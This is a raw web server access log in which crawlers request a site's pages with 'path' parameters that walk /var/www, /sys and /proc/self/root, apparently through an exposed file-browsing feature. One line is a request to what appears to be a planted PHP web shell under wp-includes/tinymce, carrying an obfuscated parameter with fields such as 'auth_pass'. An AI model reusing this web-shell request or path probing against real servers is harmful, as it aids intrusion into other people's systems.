74.7.227.215 - - [16/Nov/2025:00:07:57 +0000] "GET /2hpmqt47356.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:58 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory8/subsystem/devices/memory2/node0 HTTP/1.0" 200 4197 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:58 +0000] "GET /17foaym9401.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
136.243.153.17 - - [16/Nov/2025:00:07:59 +0000] "GET /our-works/phim-viral-ila/?path=%2Fvar%2Fwww%2Flamphim%2Fdata%2Flogs HTTP/1.0" 200 5639 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
74.7.227.8 - - [16/Nov/2025:00:07:59 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory2/node0/memory7 HTTP/1.0" 200 3670 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:59 +0000] "GET /3dptoo47721.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:59 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory8/subsystem/devices/memory5/node0 HTTP/1.0" 200 4197 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
54.156.124.2 - - [16/Nov/2025:00:07:59 +0000] "GET /our-works/tvc-nuoc-mam-thai-long/?path=//sys/class/input/event3/subsystem/input3/device HTTP/1.0" 200 3775 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:08:00 +0000] "GET /13tafxs4081.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:00 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory6/node0/power HTTP/1.0" 200 3623 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:01 +0000] "GET /59dvlrh2837.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:01 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory8/subsystem/devices/memory4/node0 HTTP/1.0" 200 4197 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:01 +0000] "GET /63xfnvk4343.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:02 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory0/subsystem/devices/memory3/node0/memory9 HTTP/1.0" 200 3672 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:02 +0000] "GET /18yfsmh6944.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:03 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory0/subsystem/devices/memory3/node0/power HTTP/1.0" 200 3630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
34.233.114.237 - - [16/Nov/2025:00:08:03 +0000] "GET /contact-us/?path=//sys/module/ata_piix/drivers HTTP/1.0" 200 3156 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:08:03 +0000] "GET /59ioat9979.html?path=/var/www/orientdragon HTTP/1.0" 200 2886 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:03 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory8/subsystem/devices/memory3/node0 HTTP/1.0" 200 4198 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:04 +0000] "GET /95heudo5215.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:04 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory0/subsystem/devices/memory5/node0 HTTP/1.0" 200 4200 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:05 +0000] "GET /140jyffa152.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:05 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory8/subsystem/devices/memory1/node0 HTTP/1.0" 200 4195 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:05 +0000] "GET /9rrcmx36455.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:06 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory8/subsystem/devices/memory2/node0/power HTTP/1.0" 200 3627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
98.82.40.168 - - [16/Nov/2025:00:08:06 +0000] "GET /our-works/tvc-kimino/?path=//sys/class/input/event1/subsystem/event1/device/subsystem/input0/event0 HTTP/1.0" 200 3391 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:08:06 +0000] "GET /129rrmm695.html?path=/var/www/trangchihere HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:06 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory1/node0 HTTP/1.0" 200 4196 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:07 +0000] "GET /69wkpjw4437.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:08 +0000] "GET /3suilr47767.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:08 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory8/subsystem/devices/memory5/node0/memory7 HTTP/1.0" 200 3668 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:09 +0000] "GET /32anpu5332.html?path=/var/www/trangchihere HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:09 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory8/subsystem/devices/memory5/node0/power HTTP/1.0" 200 3627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:09 +0000] "GET /19clsza4131.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:10 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory8/subsystem/devices/memory4/node0/memory15 HTTP/1.0" 200 3668 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.79.248.20 - - [16/Nov/2025:00:05:49 +0000] "GET /wp-includes/js/tinymce/themes/inlite/inlite/index.php?ARRAY=7o2230223n313736333235353134392p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736333235313534392q6262383962343031613530633231616632366661373637396430363861396437222p2232223n223563306234623137373836386638613030313830313630386261383031383135222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q33352q35332q36372q38302q38332q3231227q HTTP/1.0" 200 211 "-" "-"
74.7.227.215 - - [16/Nov/2025:00:08:10 +0000] "GET /91fzfpz4661.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
34.238.45.183 - - [16/Nov/2025:00:08:11 +0000] "GET /our-works/phim-viral-ila/?path=//sys/class/ata_device/dev1.1/subsystem/dev2.1/subsystem/dev2.1/subsystem HTTP/1.0" 200 3284 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:08:11 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory1/subsystem/devices/memory8/node0 HTTP/1.0" 200 4195 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:11 +0000] "GET /7bobwh10615.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:11 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory1/subsystem/devices/memory1/node0 HTTP/1.0" 200 4192 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:12 +0000] "GET /75ggtdi9055.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
136.243.153.17 - - [16/Nov/2025:00:08:12 +0000] "GET /our-works/phim-viral-ila/?path=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fphp-bin HTTP/1.0" 200 2911 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
74.7.227.8 - - [16/Nov/2025:00:08:12 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory0/subsystem/devices/memory6/node0 HTTP/1.0" 200 4200 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:13 +0000] "GET /95wiwi8905.html?path=/var/www/trangchihere HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:13 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory0/subsystem/devices/memory5/node0/memory3 HTTP/1.0" 200 3670 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:14 +0000] "GET /8hkwl18830.html?path=/var/www/trangchihere HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:14 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory9/node0 HTTP/1.0" 200 4198 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:14 +0000] "GET /6cmzru48884.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:15 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory1/subsystem/devices/memory7/node0 HTTP/1.0" 200 4197 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
34.199.252.22 - - [16/Nov/2025:00:08:15 +0000] "GET /our-works/phim-viral-ila/?path=//sys/class/input/mice/subsystem/event2/device/device/driver HTTP/1.0" 200 3486 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:08:15 +0000] "GET /6yjvqa30240.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:15 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory5/subsystem/devices/memory6/node0 HTTP/1.0" 200 4198 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:16 +0000] "GET /58yjvyj7346.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:16 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory1/subsystem/devices/memory0/node0 HTTP/1.0" 200 4198 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:17 +0000] "GET /75diraq1317.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:17 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory8/subsystem/devices/memory1/node0/power HTTP/1.0" 200 3625 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:17 +0000] "GET /9twam26627.html?path=/var/www/trangchihere HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:18 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory5/subsystem/devices/memory2/node0/power HTTP/1.0" 200 3627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
50.16.248.61 - - [16/Nov/2025:00:08:18 +0000] "GET /our-works/tvc-sjc/?path=//sys/class/ata_device/dev2.0/subsystem/dev2.0/subsystem HTTP/1.0" 200 3270 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:08:18 +0000] "GET /38pwotb1502.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:18 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory2/node0/power HTTP/1.0" 200 3627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:19 +0000] "GET /11zjzhx8361.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:19 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory1/subsystem/devices/memory1/node0/memory11 HTTP/1.0" 200 3662 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
57.141.2.9 - - [16/Nov/2025:00:08:20 +0000] "GET /?products=779510 HTTP/1.0" 200 73703 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.215 - - [16/Nov/2025:00:08:20 +0000] "GET /96ewxyz2268.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:20 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory1/subsystem/devices/memory1/node0/subsystem HTTP/1.0" 200 3455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:21 +0000] "GET /65kgvum4445.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:21 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory7/node0 HTTP/1.0" 200 4198 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:22 +0000] "GET /86plmse3132.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:22 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory5/subsystem/devices/memory4/node0 HTTP/1.0" 200 4198 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:22 +0000] "GET /293lfcmw663.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
54.84.93.8 - - [16/Nov/2025:00:08:22 +0000] "GET /our-works/phim-viral-ila/?path=//sys/class/input/input3/subsystem/mice/subsystem/input0/id HTTP/1.0" 200 3328 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:08:23 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory1/subsystem/devices/memory7/node0/memory7 HTTP/1.0" 200 3663 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:23 +0000] "GET /6ucth42616.html?path=/var/www/trangchihere HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:23 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory5/subsystem/devices/memory6/node0/power HTTP/1.0" 200 3627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
136.243.153.17 - - [16/Nov/2025:00:08:24 +0000] "GET /our-works/phim-viral-ila/?path=%2Fvar%2Fwww%2Flamphim%2Fdata%2Ftmp HTTP/1.0" 200 5831 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
74.7.227.215 - - [16/Nov/2025:00:08:24 +0000] "GET /93eloxl9665.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:24 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory1/subsystem/devices/memory0/node0/memory10 HTTP/1.0" 200 3669 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:25 +0000] "GET /74eipot8252.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:25 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory1/subsystem/devices/memory7/node0/power HTTP/1.0" 200 3626 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:25 +0000] "GET /93nonoc6885.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:26 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory1/subsystem/devices/memory0/node0/power HTTP/1.0" 200 3629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:26 +0000] "GET /52umrsr4230.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:27 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory5/subsystem/devices/memory1/node0 HTTP/1.0" 200 4196 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
18.205.91.101 - - [16/Nov/2025:00:08:27 +0000] "GET /our-works/tvc-nuoc-mam-thai-long/?path=//proc/self/root/sys/class/mem/random HTTP/1.0" 200 3334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:08:27 +0000] "GET /27vynxf2675.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:27 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory1/subsystem/devices/memory8/node0/power HTTP/1.0" 200 3625 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:28 +0000] "GET /15dxokw1919.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:08:28 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory8/subsystem/devices/memory0/node0 HTTP/1.0" 200 4199 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:08:29 +0000] "GET /281ebema455.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
